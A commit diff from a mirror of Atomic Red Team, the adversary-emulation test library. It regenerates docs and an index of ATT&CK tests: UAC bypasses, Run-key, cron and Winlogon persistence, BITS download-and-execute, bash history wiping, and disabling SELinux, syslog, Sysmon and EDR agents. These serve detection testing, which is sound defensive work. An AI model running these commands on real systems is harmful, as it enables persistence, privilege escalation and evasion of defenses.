security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-03-16 14:46:43 +00:00
parent 6ec7d4bcf0
commit 9ed5a8b444
3 changed files with 928 additions and 926 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1121/T1121.md
+5 -3
View File
@@ -28,7 +28,8 @@ Executes the Uninstall Method, No Admin Rights Required
#### Attack Commands: Run with `command_prompt`!
```
```cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
```
@@ -71,9 +72,10 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK
| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1121\src\T1121.cs|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
```powershell
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte
atomics/T1158/T1158.md
+1 -1
View File
@@ -242,7 +242,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require
```cmd
echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
```
#### Cleanup Commands:
atomics/index.yaml
+922 -922
View File
@@ -62,7 +62,7 @@ persistence:
- name: Add command to .bash_profile
description: 'Adds a command to the .bash_profile file of the current user
'
'
supported_platforms:
- macos
- linux
@@ -75,11 +75,11 @@ persistence:
name: sh
command: 'echo "#{command_to_add}" >> ~/.bash_profile
'
'
- name: Add command to .bashrc
description: 'Adds a command to the .bashrc file of the current user
'
'
supported_platforms:
- macos
- linux
@@ -92,7 +92,7 @@ persistence:
name: sh
command: 'echo "#{command_to_add}" >> ~/.bashrc
'
'
T1015:
technique:
x_mitre_permissions_required:
@@ -170,7 +170,7 @@ persistence:
description: 'Attaches cmd.exe to a list of processes. Configure your own Input
arguments to a different executable or list of executables.
'
'
supported_platforms:
- windows
input_arguments:
@@ -178,7 +178,7 @@ persistence:
description: 'Comma separated list of system binaries to which you want
to attach each #{attached_process}. Default: "osk.exe"
'
'
type: String
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
atbroker.exe
@@ -186,7 +186,7 @@ persistence:
description: 'Full path to process to attach to target in #{parent_list}.
Default: cmd.exe
'
'
type: Path
default: C:\windows\system32\cmd.exe
executor:
@@ -303,7 +303,7 @@ persistence:
- name: Admin Account Manipulate
description: 'Manipulate Admin Account Name
'
'
supported_platforms:
- windows
executor:
@@ -522,7 +522,7 @@ persistence:
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
to be loaded into each user mode process on the system
'
'
supported_platforms:
- windows
input_arguments:
@@ -535,7 +535,7 @@ persistence:
elevation_required: true
command: 'reg.exe import #{registry_file}
'
'
T1138:
technique:
x_mitre_data_sources:
@@ -642,7 +642,7 @@ persistence:
- name: New shim database files created in the default shim database directory
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
'
'
supported_platforms:
- windows
executor:
@@ -657,7 +657,7 @@ persistence:
- name: Registry key creation and/or modification events for SDB
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
'
'
supported_platforms:
- windows
executor:
@@ -772,10 +772,10 @@ persistence:
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
#{local_file}
'
'
cleanup_command: 'del #{local_file} >nul 2>&1
'
'
- name: Download & Execute via PowerShell BITS
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
@@ -796,10 +796,10 @@ persistence:
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
#{local_file}
'
'
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
'
'
- name: Persist, Download, & Execute
description: |
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
@@ -947,7 +947,7 @@ persistence:
- name: Firefox
description: 'Create a file called test.wma, with the duration of 30 seconds
'
'
supported_platforms:
- linux
- windows
@@ -1033,7 +1033,7 @@ persistence:
- name: Change Default File Association
description: 'Change Default File Association From cmd.exe
'
'
supported_platforms:
- windows
input_arguments:
@@ -1050,7 +1050,7 @@ persistence:
elevation_required: false
command: 'cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
'
'
T1136:
technique:
x_mitre_permissions_required:
@@ -1123,7 +1123,7 @@ persistence:
- name: Create a user account on a Linux system
description: 'Create a user via useradd
'
'
supported_platforms:
- linux
input_arguments:
@@ -1140,14 +1140,14 @@ persistence:
elevation_required: true
command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username}
'
'
cleanup_command: 'userdel #{username}
'
'
- name: Create a user account on a MacOS system
description: 'Creates a user on a MacOS system with dscl
'
'
supported_platforms:
- macos
input_arguments:
@@ -1171,11 +1171,11 @@ persistence:
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
cleanup_command: 'dscl . -delete /Users/#{username}
'
'
- name: Create a new user in a command prompt
description: 'Creates a new user in a command prompt
'
'
supported_platforms:
- windows
input_arguments:
@@ -1192,14 +1192,14 @@ persistence:
elevation_required: true
command: 'net user /add "#{username}" "#{password}"
'
'
cleanup_command: 'net user /del "#{username}"
'
'
- name: Create a new user in PowerShell
description: 'Creates a new user in PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -1212,15 +1212,15 @@ persistence:
elevation_required: true
command: 'New-LocalUser -Name "#{username}" -NoPassword
'
'
cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
'
'
- name: Create a new user in Linux with `root` UID and GID.
description: 'Creates a new user in Linux and adds the user to the `root` group.
This technique was used by adversaries during the Butter attack campaign.
'
'
supported_platforms:
- linux
input_arguments:
@@ -1411,7 +1411,7 @@ persistence:
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
'
'
supported_platforms:
- macos
input_arguments:
@@ -1583,7 +1583,7 @@ persistence:
- name: Create a hidden file in a hidden directory
description: 'Creates a hidden file inside a hidden directory
'
'
supported_platforms:
- linux
- macos
@@ -1595,11 +1595,11 @@ persistence:
echo "T1158" > /var/tmp/.hidden-directory/.hidden-file
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
'
'
- name: Mac Hidden file
description: 'Hide a file on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -1608,12 +1608,12 @@ persistence:
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
40 00 FF FF FF FF 00 00"
'
'
- name: Create Windows System File with Attrib
description: 'Creates a file and marks it as a system file using the attrib.exe
utility.
'
'
supported_platforms:
- windows
executor:
@@ -1624,11 +1624,11 @@ persistence:
attrib.exe +s %TEMP%\T1158.txt
cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
'
'
- name: Create Windows Hidden File with Attrib
description: 'Creates a file and marks it as hidden using the attrib.exe utility.
'
'
supported_platforms:
- windows
executor:
@@ -1639,11 +1639,11 @@ persistence:
attrib.exe +h %TEMP%\T1158_hidden.txt
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
'
'
- name: Hidden files
description: 'Requires Apple Dev Tools
'
'
supported_platforms:
- macos
input_arguments:
@@ -1656,11 +1656,11 @@ persistence:
elevation_required: false
command: 'setfile -a V #{filename}
'
'
- name: Hide a Directory
description: 'Hide a directory on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -1671,11 +1671,11 @@ persistence:
chflags hidden /var/tmp/T1158_mac.txt
cleanup_command: 'rm /var/tmp/T1158_mac.txt
'
'
- name: Show all hidden files
description: 'Show all hidden files on MacOS
'
'
supported_platforms:
- macos
executor:
@@ -1683,15 +1683,15 @@ persistence:
elevation_required: false
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
'
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
'
'
- name: Create ADS command prompt
description: 'Create an Alternate Data Stream with the command prompt. Write
access is required.
'
'
supported_platforms:
- windows
input_arguments:
@@ -1709,15 +1709,15 @@ persistence:
command: |
echo "Normal Text." > #{file_name}
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
cleanup_command: 'del #{file_name} >nul 2>&1
'
'
- name: Create ADS PowerShell
description: 'Create an Alternate Data Stream with PowerShell. Write access
is required.
'
'
supported_platforms:
- windows
input_arguments:
@@ -1739,7 +1739,7 @@ persistence:
ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
'
'
T1179:
technique:
x_mitre_data_sources:
@@ -1869,7 +1869,7 @@ persistence:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
description: 'Hooks functions in PowerShell to read TLS Communications
'
'
supported_platforms:
- windows
input_arguments:
@@ -2067,7 +2067,7 @@ persistence:
- name: IFEO Add Debugger
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -2085,15 +2085,15 @@ persistence:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
'
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /f
'
'
- name: IFEO Global Flags
description: 'Leverage Global Flags Settings
'
'
supported_platforms:
- windows
input_arguments:
@@ -2221,7 +2221,7 @@ persistence:
description: 'This test uses the insmod command to load a kernel module for
Linux.
'
'
supported_platforms:
- linux
input_arguments:
@@ -2238,10 +2238,10 @@ persistence:
elevation_required: true
command: 'insmod #{kernel_module_file}
'
'
cleanup_command: 'rmmod #{module_name}
'
'
T1159:
technique:
x_mitre_permissions_required:
@@ -2326,7 +2326,7 @@ persistence:
- name: Launch Agent
description: 'Create a plist and execute it
'
'
supported_platforms:
- macos
executor:
@@ -2428,7 +2428,7 @@ persistence:
- name: Launch Daemon
description: 'Utilize LaunchDaemon to launch `Hello World`
'
'
supported_platforms:
- macos
executor:
@@ -2512,14 +2512,14 @@ persistence:
- name: Launchctl
description: 'Utilize launchctl
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
'
'
T1168:
technique:
x_mitre_data_sources:
@@ -2607,7 +2607,7 @@ persistence:
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
'
'
supported_platforms:
- macos
- linux
@@ -2624,13 +2624,13 @@ persistence:
name: bash
command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
'
'
- name: Cron - Add script to cron folder
description: 'This test adds a script to a cron folder configured to execute
on a schedule. This technique was used by the threat actor Rocke during the
exploitation of Linux web servers.
'
'
supported_platforms:
- macos
- linux
@@ -2647,7 +2647,7 @@ persistence:
name: bash
command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
'
'
- name: Event Monitor Daemon Persistence
description: "This test adds persistence via a plist to execute via the macOS
Event Monitor Daemon. \n"
@@ -2752,7 +2752,7 @@ persistence:
description: 'Adds a registry value to run batch script created in the C:\Windows\Temp
directory.
'
'
supported_platforms:
- windows
input_arguments:
@@ -2777,7 +2777,7 @@ persistence:
- name: Scheduled Task Startup Script
description: 'Run an exe on user logon or system startup
'
'
supported_platforms:
- windows
executor:
@@ -2792,7 +2792,7 @@ persistence:
- name: Logon Scripts - Mac
description: 'Mac logon script
'
'
supported_platforms:
- macos
executor:
@@ -2808,7 +2808,7 @@ persistence:
description: 'vbs files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -2826,7 +2826,7 @@ persistence:
description: 'jse files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -2844,7 +2844,7 @@ persistence:
description: 'bat files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -3001,7 +3001,7 @@ persistence:
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
'
'
supported_platforms:
- windows
input_arguments:
@@ -3013,7 +3013,7 @@ persistence:
name: command_prompt
command: 'netsh.exe add helper #{helper_file}
'
'
T1050:
technique:
x_mitre_permissions_required:
@@ -3089,7 +3089,7 @@ persistence:
- name: Service Installation
description: 'Installs A Local Service
'
'
supported_platforms:
- windows
input_arguments:
@@ -3120,7 +3120,7 @@ persistence:
- name: Service Installation PowerShell Installs A Local Service using PowerShell
description: 'Installs A Local Service via PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -3424,7 +3424,7 @@ persistence:
- name: Plist Modification
description: 'Modify MacOS plist file in one of two directories
'
'
supported_platforms:
- macos
executor:
@@ -3517,7 +3517,7 @@ persistence:
description: 'Appends a start process cmdlet to the current user''s powershell
profile pofile that points to a malicious executable
'
'
supported_platforms:
- windows
input_arguments:
@@ -3598,7 +3598,7 @@ persistence:
command: 'echo osascript -e ''tell app "Finder" to display dialog "Hello World"''
>> /etc/rc.common
'
'
T1164:
technique:
x_mitre_permissions_required:
@@ -3767,7 +3767,7 @@ persistence:
- name: Reg Key Run
description: 'Run Key Persistence
'
'
supported_platforms:
- windows
input_arguments:
@@ -3780,15 +3780,15 @@ persistence:
command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
'
'
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/V "Atomic Red Team" /f
'
'
- name: Reg Key RunOnce
description: 'RunOnce Key Persistence
'
'
supported_platforms:
- windows
input_arguments:
@@ -3801,15 +3801,15 @@ persistence:
command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /d "#{thing_to_execute}"
'
'
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /f
'
'
- name: PowerShell Registry RunOnce
description: 'RunOnce Key Persistence via PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -3830,7 +3830,7 @@ persistence:
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
-Force -ErrorAction Ignore
'
'
T1053:
technique:
x_mitre_permissions_required:
@@ -3933,7 +3933,7 @@ persistence:
elevation_required: false
command: 'at 13:20 /interactive cmd
'
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -3952,14 +3952,14 @@ persistence:
elevation_required: true
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
'
'
- name: Scheduled task Remote
description: 'Create a task on a remote system
'
'
supported_platforms:
- windows
input_arguments:
@@ -3989,10 +3989,10 @@ persistence:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
'
'
- name: Powershell Cmdlet Scheduled Task
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
@@ -4012,7 +4012,7 @@ persistence:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
'
'
T1180:
technique:
x_mitre_data_sources:
@@ -4075,7 +4075,7 @@ persistence:
sets it as the screensaver so it will execute for persistence. Requires a
reboot and logon.
'
'
supported_platforms:
- windows
input_arguments:
@@ -4416,7 +4416,7 @@ persistence:
description: 'Make, change owner, and change file attributes on a C source code
file
'
'
supported_platforms:
- macos
- linux
@@ -4442,7 +4442,7 @@ persistence:
- name: Set a SetUID flag on file
description: 'This test sets the SetUID flag on a file in Linux and macOS.
'
'
supported_platforms:
- macos
- linux
@@ -4460,11 +4460,11 @@ persistence:
sudo chmod u+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
'
'
- name: Set a SetGID flag on file
description: 'This test sets the SetGID flag on a file in Linux and macOS.
'
'
supported_platforms:
- macos
- linux
@@ -4482,7 +4482,7 @@ persistence:
sudo chmod g+s #{file_to_setuid}
cleanup_command: 'sudo rm #{file_to_setuid}
'
'
T1023:
technique:
x_mitre_permissions_required:
@@ -4548,11 +4548,11 @@ persistence:
command: 'echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe
>> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1
'
'
- name: Create shortcut to cmd in startup folders
description: 'LNK file to launch CMD placed in startup folder
'
'
supported_platforms:
- windows
executor:
@@ -4648,10 +4648,10 @@ persistence:
elevation_required: true
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
'
'
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
'
'
T1501:
technique:
x_mitre_data_sources:
@@ -4750,7 +4750,7 @@ persistence:
description: 'This test creates a Systemd service unit file and enables it as
a service.
'
'
supported_platforms:
- linux
input_arguments:
@@ -4966,10 +4966,10 @@ persistence:
name: command_prompt
command: 'xcopy #{web_shells} #{web_shell_path}
'
'
cleanup_command: 'del #{web_shell_path} >nul 2>&1
'
'
T1084:
technique:
x_mitre_permissions_required:
@@ -5138,7 +5138,7 @@ persistence:
description: 'PowerShell code to set Winlogon shell key to execute a binary
at logon along with explorer.exe.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5152,16 +5152,16 @@ persistence:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Shell" "explorer.exe, #{binary_to_execute}" -Force
'
'
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
'
'
- name: Winlogon Userinit Key Persistence - PowerShell
description: 'PowerShell code to set Winlogon userinit key to execute a binary
at logon along with userinit.exe.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5175,16 +5175,16 @@ persistence:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
'
'
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
'
'
- name: Winlogon Notify Key Logon Persistence - PowerShell
description: 'PowerShell code to set Winlogon Notify key to execute a notification
package DLL at logon.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5201,7 +5201,7 @@ persistence:
cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
-Force -ErrorAction Ignore
'
'
defense-evasion:
T1134:
technique:
@@ -5516,10 +5516,10 @@ defense-evasion:
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
#{local_file}
'
'
cleanup_command: 'del #{local_file} >nul 2>&1
'
'
- name: Download & Execute via PowerShell BITS
description: |
This test simulates an adversary leveraging bitsadmin.exe to download
@@ -5540,10 +5540,10 @@ defense-evasion:
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
#{local_file}
'
'
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
'
'
- name: Persist, Download, & Execute
description: |
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
@@ -5639,7 +5639,7 @@ defense-evasion:
- name: Pad Binary to Change Hash - Linux/macOS dd
description: 'Uses dd to add a zero to the binary to change the hash
'
'
supported_platforms:
- macos
- linux
@@ -5653,7 +5653,7 @@ defense-evasion:
elevation_required: false
command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
'
'
T1088:
technique:
x_mitre_data_sources:
@@ -5755,7 +5755,7 @@ defense-evasion:
description: 'Bypasses User Account Control using Event Viewer and a relevant
Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
'
supported_platforms:
- windows
input_arguments:
@@ -5770,12 +5770,12 @@ defense-evasion:
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f
'
'
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
'
supported_platforms:
- windows
input_arguments:
@@ -5792,12 +5792,12 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
-ErrorAction Ignore
'
'
- name: Bypass UAC using Fodhelper
description: 'Bypasses User Account Control using the Windows 10 Features on
Demand Helper (fodhelper.exe). Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5814,12 +5814,12 @@ defense-evasion:
fodhelper.exe
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f
'
'
- name: Bypass UAC using Fodhelper - PowerShell
description: 'PowerShell code to bypass User Account Control using the Windows
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5838,12 +5838,12 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
'
- name: Bypass UAC using ComputerDefaults - PowerShell
description: 'PowerShell code to bypass User Account Control using ComputerDefaults.exe
on Windows 10
'
'
supported_platforms:
- windows
input_arguments:
@@ -5862,13 +5862,13 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
'
'
- name: Bypass UAC by Mocking Trusted Directories
description: 'Creates a fake "trusted directory" and copies a binary to bypass
UAC. The UAC bypass may not work on fully patched systems, however the directory
structure will be created.
'
'
supported_platforms:
- windows
input_arguments:
@@ -5964,7 +5964,7 @@ defense-evasion:
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
'
'
supported_platforms:
- windows
input_arguments:
@@ -5984,12 +5984,12 @@ defense-evasion:
elevation_required: false
command: 'cmstp.exe /s #{inf_file_path}
'
'
- name: CMSTP Executing UAC Bypass
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
'
'
supported_platforms:
- windows
input_arguments:
@@ -6009,7 +6009,7 @@ defense-evasion:
elevation_required: false
command: 'cmstp.exe /s #{inf_file_uac} /au
'
'
T1146:
technique:
x_mitre_data_sources:
@@ -6062,7 +6062,7 @@ defense-evasion:
- name: Clear Bash history (rm)
description: 'Clears bash history via rm
'
'
supported_platforms:
- linux
- macos
@@ -6070,11 +6070,11 @@ defense-evasion:
name: sh
command: 'rm ~/.bash_history
'
'
- name: Clear Bash history (echo)
description: 'Clears bash history via rm
'
'
supported_platforms:
- linux
- macos
@@ -6082,11 +6082,11 @@ defense-evasion:
name: sh
command: 'echo "" > ~/.bash_history
'
'
- name: Clear Bash history (cat dev/null)
description: 'Clears bash history via cat /dev/null
'
'
supported_platforms:
- linux
- macos
@@ -6094,11 +6094,11 @@ defense-evasion:
name: sh
command: 'cat /dev/null > ~/.bash_history
'
'
- name: Clear Bash history (ln dev/null)
description: 'Clears bash history via a symlink to /dev/null
'
'
supported_platforms:
- linux
- macos
@@ -6106,23 +6106,23 @@ defense-evasion:
name: sh
command: 'ln -sf /dev/null ~/.bash_history
'
'
- name: Clear Bash history (truncate)
description: 'Clears bash history via truncate
'
'
supported_platforms:
- linux
executor:
name: sh
command: 'truncate -s0 ~/.bash_history
'
'
- name: Clear history of a bunch of shells
description: 'Clears the history of a bunch of different shell types by setting
the history size to zero
'
'
supported_platforms:
- linux
- macos
@@ -6220,7 +6220,7 @@ defense-evasion:
command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file}
#{input_file}
'
'
cleanup_command: 'del #{output_file} >nul 2>&1'
T1223:
technique:
@@ -6289,7 +6289,7 @@ defense-evasion:
- name: Compiled HTML Help Local Payload
description: 'Uses hh.exe to execute a local compiled HTML Help payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -6309,11 +6309,11 @@ defense-evasion:
elevation_required: false
command: 'hh.exe #{local_chm_file}
'
'
- name: Compiled HTML Help Remote Payload
description: 'Uses hh.exe to execute a remote compiled HTML Help payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -6326,7 +6326,7 @@ defense-evasion:
elevation_required: false
command: 'hh.exe #{remote_chm_file}
'
'
T1090:
technique:
x_mitre_data_sources:
@@ -6404,7 +6404,7 @@ defense-evasion:
name: sh
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
'
'
cleanup_command: |
unset http_proxy
unset https_proxy
@@ -6514,7 +6514,7 @@ defense-evasion:
description: 'This test simulates an adversary leveraging control.exe to execute
a payload and pops calc
'
'
supported_platforms:
- windows
input_arguments:
@@ -6534,7 +6534,7 @@ defense-evasion:
elevation_required: false
command: 'control.exe #{cpl_file_path}
'
'
T1207:
technique:
x_mitre_data_sources:
@@ -6791,7 +6791,7 @@ defense-evasion:
updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl
dll to be loaded
'
'
supported_platforms:
- windows
input_arguments:
@@ -6868,7 +6868,7 @@ defense-evasion:
- name: Deobfuscate/Decode Files Or Information
description: 'Encode/Decode executable
'
'
supported_platforms:
- windows
input_arguments:
@@ -6889,7 +6889,7 @@ defense-evasion:
description: 'Rename certutil and decode a file. This is in reference to latest
research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
'
'
supported_platforms:
- windows
input_arguments:
@@ -6958,7 +6958,7 @@ defense-evasion:
- name: Disable iptables firewall
description: 'Disables the iptables firewall
'
'
supported_platforms:
- linux
executor:
@@ -6977,7 +6977,7 @@ defense-evasion:
- name: Disable syslog
description: 'Disables syslog collection
'
'
supported_platforms:
- linux
executor:
@@ -6994,7 +6994,7 @@ defense-evasion:
- name: Disable Cb Response
description: 'Disable the Cb Response service
'
'
supported_platforms:
- linux
executor:
@@ -7011,52 +7011,52 @@ defense-evasion:
- name: Disable SELinux
description: 'Disables SELinux enforcement
'
'
supported_platforms:
- linux
executor:
name: sh
command: 'setenforce 0
'
'
- name: Disable Carbon Black Response
description: 'Disables Carbon Black Response
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
'
'
- name: Disable LittleSnitch
description: 'Disables LittleSnitch
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
'
'
- name: Disable OpenDNS Umbrella
description: 'Disables OpenDNS Umbrella
'
'
supported_platforms:
- macos
executor:
name: sh
command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
'
'
- name: Unload Sysmon Filter Driver
description: 'Unloads the Sysinternals Sysmon filter driver without stopping
the Sysmon service.
'
'
supported_platforms:
- windows
input_arguments:
@@ -7075,10 +7075,10 @@ defense-evasion:
elevation_required: true
prereq_command: 'fltmc.exe filters | findstr #{sysmon_driver}
'
'
command: 'fltmc.exe unload #{sysmon_driver}
'
'
cleanup_command: |
sc stop sysmon
fltmc.exe load #{sysmon_driver}
@@ -7099,19 +7099,19 @@ defense-evasion:
prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {exit
0} else {exit 1}
'
'
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:true
'
'
